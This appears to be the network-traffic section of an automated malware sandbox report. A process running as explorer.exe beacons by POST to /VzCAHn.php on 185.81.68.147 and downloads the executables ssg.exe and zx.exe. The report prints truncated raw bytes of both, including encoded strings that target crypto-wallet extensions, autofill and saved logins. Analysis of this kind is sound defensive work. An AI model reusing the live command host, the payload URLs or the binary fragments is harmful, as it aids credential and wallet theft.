                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.590502977 CET5002280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.699507952 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.710310936 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.819307089 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.819463968 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.819523096 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.939388990 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.939480066 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:44.059339046 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.483270884 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.483608961 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.484090090 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.484685898 CET5002880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.590450048 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.604347944 CET8050028185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.710295916 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.710443020 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.710473061 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.830358028 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.830466032 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:45.950277090 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.363193035 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.363269091 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.363369942 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.364784956 CET5003380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.480663061 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.484594107 CET8050033185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.600346088 CET8050037185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.601980925 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.602068901 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.721765041 CET8050037185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.722359896 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:47.843384027 CET8050037185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:49.212102890 CET8050037185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:49.212285995 CET8050037185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:49.212383032 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:52.499746084 CET5003780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:52.619683981 CET8050037185.81.68.147192.168.2.10

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • 185.81.68.147

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.1049708185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:42:43.976188898 CET259OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.302553892 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:42:44 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 40
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 63 66 36 65 65 38 30 35 63 31 37 61 31 30 31 33 65 38 37 36 65 30 63 63 61 66 34 34 62 66 34 66 34 64 37 61 31 35 63 35
                                                                                                                                                                                                                                Data Ascii: cf6ee805c17a1013e876e0ccaf44bf4f4d7a15c5


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.1049710185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.442727089 CET279OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 33
                                                                                                                                                                                                                                Dec 16, 2024 10:42:45.562746048 CET33OUTData Raw: 01 09 42 19 57 16 05 49 52 01 4b 51 4d 00 4d 03 19 7a 65 79 2e 1d 33 20 1d 04 46 5b 09 1a 05 1a 03
                                                                                                                                                                                                                                Data Ascii: BWIRKQMMzey.3 F[
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.035459042 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:42:46 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.1049711185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.158353090 CET278OUTPOST /VzCAHn.php?443320E440F81953448019 HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                Dec 16, 2024 10:42:47.278316975 CET6OUTData Raw: 13 0f 58 02
                                                                                                                                                                                                                                Data Ascii: X
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.598004103 CET315INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:42:47 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 98
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 53 1a 5e 11 11 48 0a 1a 4c 00 0f 54 1f 08 00 1d 53 00 19 07 51 07 4c 10 12 01 1a 51 1a 03 39 6c 04 18 5f 15 45 45 59 1a 4c 57 0e 50 4b 00 01 1b 55 09 19 50 05 07 1e 49 1d 16 52 4e 00 3d 69 52 1d 0e 40 40 12 5c 1b 49 05 5c 02 4f 09 04 4d 03 5b 48 07 51 52 17 45 45 07 50 43 04 1f 55 49 56 68 32
                                                                                                                                                                                                                                Data Ascii: S^HLTSQLQ9l_EEYLWPKUPIRN=iR@@\I\OM[HQREEPCUIVh2


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.1049717185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:42:48.719851017 CET232OUTGET /ssg.exe HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047136068 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:42:49 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 10:50:51 GMT
                                                                                                                                                                                                                                ETag: "4b200-629107cd804d2"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 307712
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @<O H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047302008 CET1236INData Raw: 39 00 6c 00 61 00 47 00 78 00 6c 00 5a 00 6d 00 35 00 72 00 62 00 32 00 52 00 69 00 5a 00 57 00 5a 00 6e 00 63 00 47 00 64 00 72 00 62 00 6d 00 35 00 38 00 54 00 57 00 56 00 30 00 59 00 57 00 31 00 68 00 63 00 32 00 73 00 4b 00 59 00 57 00 5a 00
                                                                                                                                                                                                                                Data Ascii: 9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Np
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047343969 CET1236INData Raw: 62 00 32 00 31 00 69 00 59 00 58 00 51 00 4b 00 5a 00 6d 00 68 00 70 00 62 00 47 00 46 00 6f 00 5a 00 57 00 6c 00 74 00 5a 00 32 00 78 00 70 00 5a 00 32 00 35 00 6b 00 5a 00 47 00 74 00 71 00 5a 00 32 00 39 00 6d 00 61 00 32 00 4e 00 69 00 5a 00
                                                                                                                                                                                                                                Data Ascii: b21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047359943 CET672INData Raw: 31 00 6c 00 61 00 57 00 31 00 6f 00 62 00 48 00 42 00 74 00 5a 00 32 00 70 00 75 00 61 00 6d 00 39 00 77 00 61 00 47 00 68 00 77 00 61 00 32 00 74 00 76 00 62 00 47 00 70 00 77 00 59 00 58 00 78 00 51 00 61 00 47 00 46 00 75 00 64 00 47 00 39 00
                                                                                                                                                                                                                                Data Ascii: 1laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhProfilesSOFTWASkyBoxRE\MicrSkyBoxosoft\WinSkyBoxdows NT\CurrentVersSky
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047370911 CET1236INData Raw: 0e ff fb fd 85 38 56 0f ae d5 1e 3d 2d 39 27 36 0f d9 64 0a 5c a6 21 68 5b 54 d1 9b 36 2e 3a 24 0a 67 b1 0c 57 e7 0f 93 ee 96 d2 b4 9b 91 9e 1b c0 c5 4f 80 dc 20 a2 61 77 4b 69 5a 12 1a 16 1c 93 ba 0a e2 a0 2a e5 c0 22 e0 43 3c 1b 17 1d 12 09 0d
                                                                                                                                                                                                                                Data Ascii: 8V=-9'6d\!h[T6.:$gWO awKiZ*"C<-WuL`&r\f;D~4[C)v#hc1cB"@ J$}=2)m/K0Rwl+pHd"G?},V3"IN86
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047461033 CET1236INData Raw: 1c e1 fd fd ae 3d 93 93 6a 4c 26 26 5a 6c 36 36 41 7e 3f 3f 02 f5 f7 f7 4f 83 cc cc 5c 68 34 34 f4 51 a5 a5 34 d1 e5 e5 08 f9 f1 f1 93 e2 71 71 73 ab d8 d8 53 62 31 31 3f 2a 15 15 0c 08 04 04 52 95 c7 c7 65 46 23 23 5e 9d c3 c3 28 30 18 18 a1 37
                                                                                                                                                                                                                                Data Ascii: =jL&&Zl66A~??O\h44Q4qqsSb11?*ReF##^(07/6$=&iN''uutX,,.4-6nnZZ[RRMv;;a}{R))>q^//SSh,`@ y[[jjFgKr99JJL
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047473907 CET1236INData Raw: 30 28 87 f2 23 bf a5 b2 02 03 6a ba ed 16 82 5c 8a cf 1c 2b a7 79 b4 92 f3 07 f2 f0 4e 69 e2 a1 65 da f4 cd 06 05 be d5 d1 34 62 1f c4 a6 fe 8a 34 2e 53 9d a2 f3 55 a0 05 8a e1 32 a4 f6 eb 75 0b 83 ec 39 40 60 ef aa 5e 71 9f 06 bd 6e 10 51 3e 21
                                                                                                                                                                                                                                Data Ascii: 0(#j\+yNie4b4.SU2u9@`^qnQ>!=>MFTq]o`P$@CgwB[8y|G|B2+HplZrN8V=6-9'dh\![T$6.:gWOa ZwKi
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047487020 CET1236INData Raw: cf 4a 85 cf d0 6b bb d0 ef 2a c5 ef aa e5 4f aa fb 16 ed fb 43 c5 86 43 4d d7 9a 4d 33 55 66 33 85 94 11 85 45 cf 8a 45 f9 10 e9 f9 02 06 04 02 7f 81 fe 7f 50 f0 a0 50 3c 44 78 3c 9f ba 25 9f a8 e3 4b a8 51 f3 a2 51 a3 fe 5d a3 40 c0 80 40 8f 8a
                                                                                                                                                                                                                                Data Ascii: Jk*OCCMM3Uf3EEPP<Dx<%KQQ]@@?!8Hp8cwu!cB!0 mL5&/__5DD9.WU~~=Gz=dd]]+2ss``OO"fD"*~T*;FF)k<(
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047667980 CET1236INData Raw: 74 00 6c 00 62 00 6d 00 78 00 6d 00 61 00 33 00 78 00 55 00 62 00 32 00 35 00 44 00 63 00 6e 00 6c 00 7a 00 64 00 47 00 46 00 73 00 43 00 6e 00 42 00 6b 00 59 00 57 00 52 00 71 00 61 00 32 00 5a 00 72 00 5a 00 32 00 4e 00 68 00 5a 00 6d 00 64 00
                                                                                                                                                                                                                                Data Ascii: tlbmxma3xUb25DcnlzdGFsCnBkYWRqa2ZrZ2NhZmdiY2VpbWNwYmthbG5mbmVwYm5rfEthcmRpYUNoYWluCmJmbmFlbG1vbWVpbWhscG1nam5qb3BoaHBra29s
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.047681093 CET1236INData Raw: 61 00 6d 00 78 00 69 00 61 00 32 00 6c 00 70 00 61 00 6d 00 6c 00 75 00 61 00 48 00 42 00 74 00 62 00 6d 00 70 00 6d 00 5a 00 6d 00 4e 00 76 00 5a 00 6d 00 70 00 76 00 62 00 6d 00 4a 00 6d 00 59 00 6d 00 64 00 68 00 62 00 32 00 4e 00 38 00 56 00
                                                                                                                                                                                                                                Data Ascii: amxia2lpamluaHBtbmpmZmNvZmpvbmJmYmdhb2N8VGVtcGxlV2FsbGV0%appdata%\loginsnpvo*aGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJo
                                                                                                                                                                                                                                Dec 16, 2024 10:42:50.167165041 CET1236INData Raw: 5a 00 57 00 6c 00 70 00 61 00 57 00 35 00 74 00 61 00 6d 00 4a 00 71 00 62 00 47 00 64 00 68 00 62 00 47 00 68 00 6a 00 5a 00 57 00 78 00 6e 00 59 00 6d 00 56 00 71 00 62 00 57 00 35 00 70 00 5a 00 48 00 78 00 4f 00 61 00 57 00 5a 00 30 00 65 00
                                                                                                                                                                                                                                Data Ascii: ZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYW


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.1049723185.81.68.147803968C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 16, 2024 10:42:51.379668951 CET231OUTGET /zx.exe HTTP/1.1
                                                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717629910 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 17:42:52 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                Last-Modified: Sun, 15 Dec 2024 08:15:56 GMT
                                                                                                                                                                                                                                ETag: "5a4530-6294aac656b58"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 5915952
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 90 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 c5 45 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd<^g"(X@EZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717808008 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717818975 CET1236INData Raw: 48 85 c0 75 15 48 8d 56 12 48 8d 0d da a7 02 00 e8 4d 15 00 00 e9 02 01 00 00 8b 56 04 45 33 c0 48 03 93 00 10 00 00 49 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c
                                                                                                                                                                                                                                Data Ascii: HuHVHMVE3HI7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH|$`Lt$Pt
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717829943 CET224INData Raw: 48 48 8b 6c 24 40 4c 8b 64 24 50 85 c0 74 0b 49 8b ce e8 e3 2b 01 00 45 33 f6 49 8b cf e8 e8 dd 00 00 48 8b 5c 24 58 49 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa
                                                                                                                                                                                                                                Data Ascii: HHl$@Ld$PtI+E3IH\$XIH A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717946053 CET1236INData Raw: 4c 89 7c 24 20 48 8b cb e8 21 29 00 00 4c 8b f8 48 85 c0 75 1a 48 8d 57 12 48 8d 0d 16 a2 02 00 e8 89 0f 00 00 bb ff ff ff ff e9 54 01 00 00 8b 57 04 45 33 c0 48 03 93 00 10 00 00 49 8b cf e8 6e e3 00 00 85 c0 79 21 4c 8d 47 12 48 8d 15 1b a2 02
                                                                                                                                                                                                                                Data Ascii: L|$ H!)LHuHWHTWE3HIny!LGHHPuE3MHI.Ll$03A Lt$(A*LHu!LGHH^Ht$XwHHl$P@ffI;H
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717967033 CET1236INData Raw: e9 93 00 00 00 48 8b 93 08 10 00 00 48 3b 93 10 10 00 00 0f 83 7f 00 00 00 44 8b 05 e2 c4 03 00 66 0f 6f 0d 52 9f 02 00 66 90 33 c0 41 83 f8 02 7c 18 f3 0f 6f 02 66 0f 38 00 c1 f3 0f 7f 02 eb 1a 66 0f 1f 84 00 00 00 00 00 8b 0c 82 0f c9 89 0c 82
                                                                                                                                                                                                                                Data Ascii: HH;DfoRf3A|of8fHH|JAtdtntxt2HH;rHH$HH$H3L$I[ Ik(I_LD$LL$ SUVWH8IHl$
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.717978954 CET1236INData Raw: 0f b7 44 24 6c 48 8b cf 0f b7 54 24 68 66 44 2b 44 24 64 66 2b 54 24 60 e8 e9 00 00 00 48 8b 8c 24 70 02 00 00 48 33 cc e8 59 98 00 00 4c 8d 9c 24 80 02 00 00 49 8b 5b 18 49 8b 6b 20 49 8b 73 28 49 8b e3 5f c3 48 89 5c 24 08 57 48 83 ec 20 49 8b
                                                                                                                                                                                                                                Data Ascii: D$lHT$hfD+D$df+T$`H$pH3YL$I[Ik Is(I_H\$WH IHtftZt(uA@f;wAH\$0H _LIY\HH\$0H _:LIH(E33H*H\$03
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718061924 CET1236INData Raw: 48 85 db 74 10 45 33 c0 33 d2 48 8b cb e8 e0 61 00 00 48 8b e8 48 85 ed 4c 8d 05 c3 96 02 00 49 8b d6 48 8b cf 4c 0f 45 c5 e8 14 fe ff ff 48 8b cf 8b d8 e8 66 1c 01 00 49 8b ce e8 5e 1c 01 00 48 8b cd e8 56 1c 01 00 48 8b 6c 24 38 8b c3 48 8b 5c
                                                                                                                                                                                                                                Data Ascii: HtE33HaHHLIHLEHfI^HVHl$8H\$0Ht$@H|$HH A^LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHH8_^][LD$LL$ SUVWH8IHl$xHH
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718105078 CET1236INData Raw: 00 04 00 00 48 8b 08 48 83 c9 01 e8 56 15 01 00 41 b9 30 00 00 00 4c 8d 05 a1 92 02 00 48 8d 54 24 30 33 c9 ff 15 0c 8a 02 00 48 8b 8c 24 30 08 00 00 48 33 cc e8 a4 8e 00 00 48 81 c4 48 08 00 00 5f 5b c3 cc cc cc cc cc cc cc cc cc cc 48 89 54 24
                                                                                                                                                                                                                                Data Ascii: HHVA0LHT$03H$0H3HH_[HT$LD$LL$ SVWPtH+H:H3H$@HH$L$xHT$@Ht$(A3HHHt$ Ht$0AH5D$(DHt$ 35H
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.718116999 CET1236INData Raw: 85 02 00 8b 53 0c 48 8b cd 48 8b 05 b2 0f 04 00 ff 15 e4 85 02 00 48 8b cd 48 8b f8 e8 d5 12 01 00 48 85 ff 0f 84 9d 01 00 00 48 8b 05 c1 0f 04 00 48 8d 15 02 90 02 00 4c 8b c7 49 8b cf ff 15 b6 85 02 00 48 8b 05 4f 0f 04 00 4d 8b c4 49 8b d4 48
                                                                                                                                                                                                                                Data Ascii: SHHHHHHHLIHOMIHHtbHHHH;3H$H$H$L$`L$hH$PH3VHpA_A]^HLD$8HT$0HL$@HLD$8HT$0HL$@
                                                                                                                                                                                                                                Dec 16, 2024 10:42:52.837873936 CET1236INData Raw: 8b ac 24 e8 30 00 00 48 8b bc 24 28 31 00 00 48 8b ac 24 18 31 00 00 4c 39 74 24 30 74 24 48 8d 44 24 30 0f 1f 00 48 8b c8 e8 38 e5 ff ff 48 8d 44 24 30 4d 8d 76 01 4a 83 3c f0 00 4a 8d 04 f0 75 e4 8b c3 48 8b 8c 24 d0 30 00 00 48 33 cc e8 e2 84
                                                                                                                                                                                                                                Data Ascii: $0H$(1H$1L9t$0t$HD$0H8HD$0MvJ<JuH$0H3H0A^[@SH H$H(0HtMH(0H [@S0@H+HJH3H$ @HHT$ 3A|uHH_


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
